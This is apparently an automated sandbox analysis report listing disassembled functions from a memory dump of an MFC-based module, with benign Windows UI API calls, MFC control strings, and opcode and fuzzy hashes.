Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3RectWindow$Ctrl
String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 2598721110-2628993547
Opcode ID: c907e6db706b14ebef3fe687d7de609c74b100046dad53d025df7d24e96772bc
Instruction ID: b3213dce73bb928830b6c29c0cbf9327f95a156eccebdf038f43f31b920dcf19
Opcode Fuzzy Hash: c907e6db706b14ebef3fe687d7de609c74b100046dad53d025df7d24e96772bc
Instruction Fuzzy Hash: 3B716B71A001099FCF04EFA4C8909FEB777BF88318F490468E911AB7A0EB35A816DB55

Function 6CB39BAB Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB39BB2

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB3BE0E: __EH_prolog3.LIBCMT ref: 6CB3BE15

Strings

MFCFontComboBox, xrefs: 6CB39C76
MFCMenuButton, xrefs: 6CB39D1B
MFCLink, xrefs: 6CB39CAD
MFCButton, xrefs: 6CB39BD1
MFCMaskedEdit, xrefs: 6CB39CE4
MFCVSListBox, xrefs: 6CB39DE9
MFCShellList, xrefs: 6CB39D89
MFCEditBrowse, xrefs: 6CB39C3F
MFCColorButton, xrefs: 6CB39C08
MFCPropertyGrid, xrefs: 6CB39D52
MFCShellTree, xrefs: 6CB39DB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 431132790-2110171958
Opcode ID: 9d8850064e4ef8223de8c1e586e0fc6588441e1c274578d11c3bb2f7bbc21309
Instruction ID: cf223e9c8b6f14b43a52b37f1cb46e585dd2d2da3cdfdf7a629b49cfbc420f27
Opcode Fuzzy Hash: 9d8850064e4ef8223de8c1e586e0fc6588441e1c274578d11c3bb2f7bbc21309
Instruction Fuzzy Hash: 0B516120E492E6D6EF44E6B9E914BEE77E0AF0530CF14542A9449E7EC0EF34CA1C9652

Function 6CB35910 Relevance: 19.8, APIs: 13, Instructions: 251memorywindowCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000004,?), ref: 6CB359EF
GlobalLock.KERNEL32(00000000), ref: 6CB359F8
GlobalUnlock.KERNEL32(00000000), ref: 6CB35A09
SetPropW.USER32(?,00000000), ref: 6CB35A19
GlobalFree.KERNEL32(00000000), ref: 6CB35A24
IsWindowEnabled.USER32(00000000), ref: 6CB35ACA
EnableWindow.USER32(00000000,00000000), ref: 6CB35AD6
GetCapture.USER32 ref: 6CB35AE3
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6CB35AF2
EnableWindow.USER32(00000000,00000001), ref: 6CB35BCC
GetActiveWindow.USER32 ref: 6CB35BD6
SetActiveWindow.USER32(00000000), ref: 6CB35BE2
EnableWindow.USER32(00000000,00000001), ref: 6CB35C20

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Global$Enable$Active$AllocCaptureEnabledFreeLockMessagePropSendUnlock
String ID:
API String ID: 2841214920-0
Opcode ID: c49be1b967bf4d752ba21d6e86d9987a52a1fb453fc3f526dc69fc4b9f516f61
Instruction ID: 96125eed47504297aeee05deb039cbe2b9c1ab69632ed7f34f8320d767f8ce47
Opcode Fuzzy Hash: c49be1b967bf4d752ba21d6e86d9987a52a1fb453fc3f526dc69fc4b9f516f61
Instruction Fuzzy Hash: 4291D370701665ABDB049F74C848BAE7BB9FF05318F141219EA1CD7B80DB74D819CB99

Function 6CB25875 Relevance: 19.7, APIs: 13, Instructions: 199windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB2587C
GetSysColor.USER32(00000014), ref: 6CB258B3

Part of subcall function 6CB24FE2: __EH_prolog3.LIBCMT ref: 6CB24FE9
Part of subcall function 6CB24FE2: CreateSolidBrush.GDI32(?), ref: 6CB25004

GetSysColor.USER32(00000010), ref: 6CB258C8
CreateCompatibleDC.GDI32(00000000), ref: 6CB258DC
CreateCompatibleDC.GDI32(00000000), ref: 6CB258F4
GetObjectW.GDI32(00000004,00000018,?), ref: 6CB25917
CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6CB25938
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6CB25959

Part of subcall function 6CB26249: SelectObject.GDI32(0000005C,?), ref: 6CB26252

GetPixel.GDI32(?,00000000,00000000), ref: 6CB259A1

Part of subcall function 6CB26355: SetBkColor.GDI32(?,?), ref: 6CB2636A
Part of subcall function 6CB26355: SetBkColor.GDI32(?,?), ref: 6CB2637C

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6CB259CA
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 6CB259F4
BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 6CB25A5F
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 6CB25A88

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Create$Color$BitmapCompatibleH_prolog3Object$BrushPixelSelectSolid
String ID:
API String ID: 758415642-0
Opcode ID: 08323e8364ab8995419a0f2a2342bda2835ac1a666e37d5f20c9852594f82966
Instruction ID: 49279bef0d7e2e3899f007e23fde94cc3cc7e006dcec2392d7973ab8e9bf5fb4
Opcode Fuzzy Hash: 08323e8364ab8995419a0f2a2342bda2835ac1a666e37d5f20c9852594f82966
Instruction Fuzzy Hash: F57123B2901148AFDF019FE0CD85AFEBB79FF19704F140028BA09F66A4EB755919DB60

Function 6CB547CC Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 163COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB547D3

Part of subcall function 6CBC770F: __EH_prolog3.LIBCMT ref: 6CBC7716

Part of subcall function 6CB2D542: GetDlgCtrlID.USER32(?), ref: 6CB2D54D

Part of subcall function 6CB51EDC: __EH_prolog3.LIBCMT ref: 6CB51EE3

Strings

RecentFrameAlignment, xrefs: 6CB548F2
RectRecentFloat, xrefs: 6CB548B4
Panes, xrefs: 6CB547E3
IsFloating, xrefs: 6CB5493B
%TsPane-%d, xrefs: 6CB54829
%TsPane-%d%x, xrefs: 6CB54840
RectRecentDocked, xrefs: 6CB548D3
RecentRowIndex, xrefs: 6CB5491D
MRUWidth, xrefs: 6CB54959
PinState, xrefs: 6CB54977

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
API String ID: 3879667756-2628993547
Opcode ID: 7273c90c4fa6481d5d866388d1ca84c890825435d4515f394e1befdd08c637a8
Instruction ID: a47eac884104720b939182c66eaad1dbad491b9c98ec3ec20ef65c6fa0691d14
Opcode Fuzzy Hash: 7273c90c4fa6481d5d866388d1ca84c890825435d4515f394e1befdd08c637a8
Instruction Fuzzy Hash: E2519E71E000199BCF04DF58CC909FE7BB6BF88358B140459E825AB790EB34AD26DB95

Function 6CB44EB6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 161windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CB44EDD
LoadCursorW.USER32(?,00007904), ref: 6CB44F03
LoadCursorW.USER32(?,00007905), ref: 6CB44F36
SendMessageW.USER32(?,0000120A,00000000,00000006), ref: 6CB44F94
SendMessageW.USER32(?,0000120A,00000001,00000006), ref: 6CB44FC9
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 6CB45022
SendMessageW.USER32(?,00000418,00000000,?), ref: 6CB45050
GetParent.USER32(?), ref: 6CB4508B

Strings

d, xrefs: 6CB44FA3
Value, xrefs: 6CB44F9C
Property, xrefs: 6CB44F68

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$CursorLoad$EmptyParentRect
String ID: Property$Value$d
API String ID: 2284761715-1409410049
Opcode ID: 0bc3c932c6fc1e8b334ae9ad18279675af7d797797065afdae5627fc5a1c8da7
Instruction ID: dabc1676faebf79e4e4cd5e6afd093524fa5a545fc230ef03621335e77690b92
Opcode Fuzzy Hash: 0bc3c932c6fc1e8b334ae9ad18279675af7d797797065afdae5627fc5a1c8da7
Instruction Fuzzy Hash: 5751A071B01214AFCF049F64C888EEEBBB9FF49354F4501A9E519A77A0EB346C15CB91

Function 6CB381E3 Relevance: 18.4, APIs: 12, Instructions: 408COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB381EA
PathRemoveFileSpecW.SHLWAPI(?,00000000), ref: 6CB382CE
_wcslen.LIBCMT ref: 6CB38326
CoTaskMemFree.OLE32(00000000), ref: 6CB3833B
PathRemoveFileSpecW.SHLWAPI(?), ref: 6CB3843C
_wcslen.LIBCMT ref: 6CB38468
CoTaskMemFree.OLE32(?), ref: 6CB3847D
PathRemoveFileSpecW.SHLWAPI(?,?), ref: 6CB384CE
_wcslen.LIBCMT ref: 6CB38528
CoTaskMemFree.OLE32(?), ref: 6CB3853B
PathFindFileNameW.SHLWAPI(?,00000000), ref: 6CB38637
PathFindExtensionW.SHLWAPI(?,00000000), ref: 6CB3865F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Path$File$FreeRemoveSpecTask_wcslen$Find$ExtensionH_prolog3Name
String ID:
API String ID: 3658334021-0
Opcode ID: 95e1dbb98eb9dfb890eed95c5a9c8924babf798d1ecd55b31b74c807a474f048
Instruction ID: 1d8a7f6e18fb58c9637129ce483c97a10e3e89d2c5ac2fdb85b115a08abecb09
Opcode Fuzzy Hash: 95e1dbb98eb9dfb890eed95c5a9c8924babf798d1ecd55b31b74c807a474f048
Instruction Fuzzy Hash: 03F16C70A00155DFCF04DFA8C894EAEB7B5FF48318B144159E819AB7A0EB31ED16CB65

Function 6CBC81CF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6CBC81F9
MonitorFromPoint.USER32(6CD5293C,?,00000002), ref: 6CBC822D
GetMonitorInfoW.USER32(00000000), ref: 6CBC8234
CopyRect.USER32(?,?), ref: 6CBC8246
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6CBC8256
OffsetRect.USER32(?,?,00000000), ref: 6CBC8279
OffsetRect.USER32(?,?,00000000), ref: 6CBC829C
OffsetRect.USER32(?,00000000,?), ref: 6CBC82C1
OffsetRect.USER32(?,00000000,?), ref: 6CBC82E5

Strings

(, xrefs: 6CBC8226

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
String ID: (
API String ID: 4030222242-3887548279
Opcode ID: 802d52c180eb841f2fb79937ecfd004b0c53158b1b4c955346f07fbd38600ba8
Instruction ID: e619c1a27cc6428fcf6720df2c1385faf22da41672c51d4c4a926554cd16d115
Opcode Fuzzy Hash: 802d52c180eb841f2fb79937ecfd004b0c53158b1b4c955346f07fbd38600ba8
Instruction Fuzzy Hash: 9C414B71B01649EFDB04CFA9C9888BFFBB9FB85700B10812EE8159B604D731AD05CBA1

Function 6CB28439 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB28443
SendMessageW.USER32(?,00000000,00000000,00000080), ref: 6CB28489
SendMessageW.USER32(?,00000000,00000000), ref: 6CB284B5
ValidateRect.USER32(?,00000000), ref: 6CB284C4

Strings

W, xrefs: 6CB284F9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3_RectValidate
String ID: W
API String ID: 3261311288-655174618
Opcode ID: c810a0d0bea6944e7a00418c6d4fbdf8fdd3b9c06aaabebe7c45e0467f77098b
Instruction ID: f3945cd7c6e1a5c36c737f21dc93c9168f30948bb0bd82683079ff58ba7f92c1
Opcode Fuzzy Hash: c810a0d0bea6944e7a00418c6d4fbdf8fdd3b9c06aaabebe7c45e0467f77098b
Instruction Fuzzy Hash: 9E41AE71A01689EFDF109F60CC94ABEBBB5FF49308F14452EE15A93A20DB3A9804CF11

Function 6CB53D10 Relevance: 16.9, APIs: 11, Instructions: 440windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6CB53D87
GetCursorPos.USER32(?), ref: 6CB53DB5
ClientToScreen.USER32(?,?), ref: 6CB53DD4
ScreenToClient.USER32(?,?), ref: 6CB53EC9
SendMessageW.USER32(?,00000202,0000FFFF,?), ref: 6CB53EF0
SendMessageW.USER32(?,00000202,00000000,?), ref: 6CB53F3E
GetParent.USER32(?), ref: 6CB53F47
GetWindowRect.USER32(?,?), ref: 6CB540B9
ClientToScreen.USER32(?,?), ref: 6CB540D8
OffsetRect.USER32(?,?,?), ref: 6CB5413D
RedrawWindow.USER32(?,?,00000000,000005B1), ref: 6CB541A8

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClientRectScreenWindow$MessageSend$CursorOffsetParentRedraw
String ID:
API String ID: 1197204355-0
Opcode ID: e0dbd5b5336e3d4af9702c82f7658262c64b3a635bec683f2f53585963a76783
Instruction ID: 454229681a7f9d2205678a39ddff5e4d315f3bea1565e04ab8758fa22369ef86
Opcode Fuzzy Hash: e0dbd5b5336e3d4af9702c82f7658262c64b3a635bec683f2f53585963a76783
Instruction Fuzzy Hash: 16F16E71B002249FCF04DF68C894AFD7BB6AF49304F5400A9E815AB7A1DB34AD26CF95

Function 6CB458E9 Relevance: 16.9, APIs: 11, Instructions: 433COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB458F3
IsRectEmpty.USER32(?), ref: 6CB45913
FillRect.USER32(?,?,?), ref: 6CB459D7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$EmptyFillH_prolog3_
String ID:
API String ID: 3863378599-0
Opcode ID: ef59beb4f30292b3df08a488da61e7fd641848073ce7d43a4426b08096fc4591
Instruction ID: af51ecac24dd2bb0405e6cc02d227a152326f4097e27ced626597e999f28cd8d
Opcode Fuzzy Hash: ef59beb4f30292b3df08a488da61e7fd641848073ce7d43a4426b08096fc4591
Instruction Fuzzy Hash: DF027831E05A59CFCF01CFA4C884ADEB7B6FF05308F148059E815AB659D774AA4ACF94

Function 6CB48CB8 Relevance: 16.7, APIs: 11, Instructions: 243windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB48CBF
ClientToScreen.USER32(?,?), ref: 6CB48CF6
GetWindowRect.USER32(?,?), ref: 6CB48D14
PtInRect.USER32(?,?,?), ref: 6CB48D24
IsWindowVisible.USER32(?), ref: 6CB48D34
IsWindowVisible.USER32(?), ref: 6CB48D48
SetRectEmpty.USER32(?), ref: 6CB48D56
GetCapture.USER32 ref: 6CB48D5F
ReleaseCapture.USER32 ref: 6CB48D69
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6CB48F87
SetCapture.USER32(?), ref: 6CB48FAB

Part of subcall function 6CB98570: SetRectEmpty.USER32(?), ref: 6CB98585

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$CaptureWindow$EmptyVisible$ClientH_prolog3_MessageReleaseScreenSend
String ID:
API String ID: 2255435817-0
Opcode ID: 3bd69bef91e8d02f2aba053eab054f2ab4234b9202be6908675d7a5abeed0c2f
Instruction ID: dcb7f94c8aa4f32611aef84d2f0cbc71c1bb4c9bd583284bbb71d29cc10a8139
Opcode Fuzzy Hash: 3bd69bef91e8d02f2aba053eab054f2ab4234b9202be6908675d7a5abeed0c2f
Instruction Fuzzy Hash: 4AA1BE70909295DFCF05CFA4C884AEDBBB6FF04308F14843AE815EB659EB319949DB91

Function 6CB46C30 Relevance: 16.6, APIs: 11, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 6CB46C6A
ReleaseCapture.USER32 ref: 6CB46C74
GetClientRect.USER32(?,?), ref: 6CB46C8D
GetSystemMetrics.USER32(00000015), ref: 6CB46CA9
GetSystemMetrics.USER32(00000015), ref: 6CB46CD0
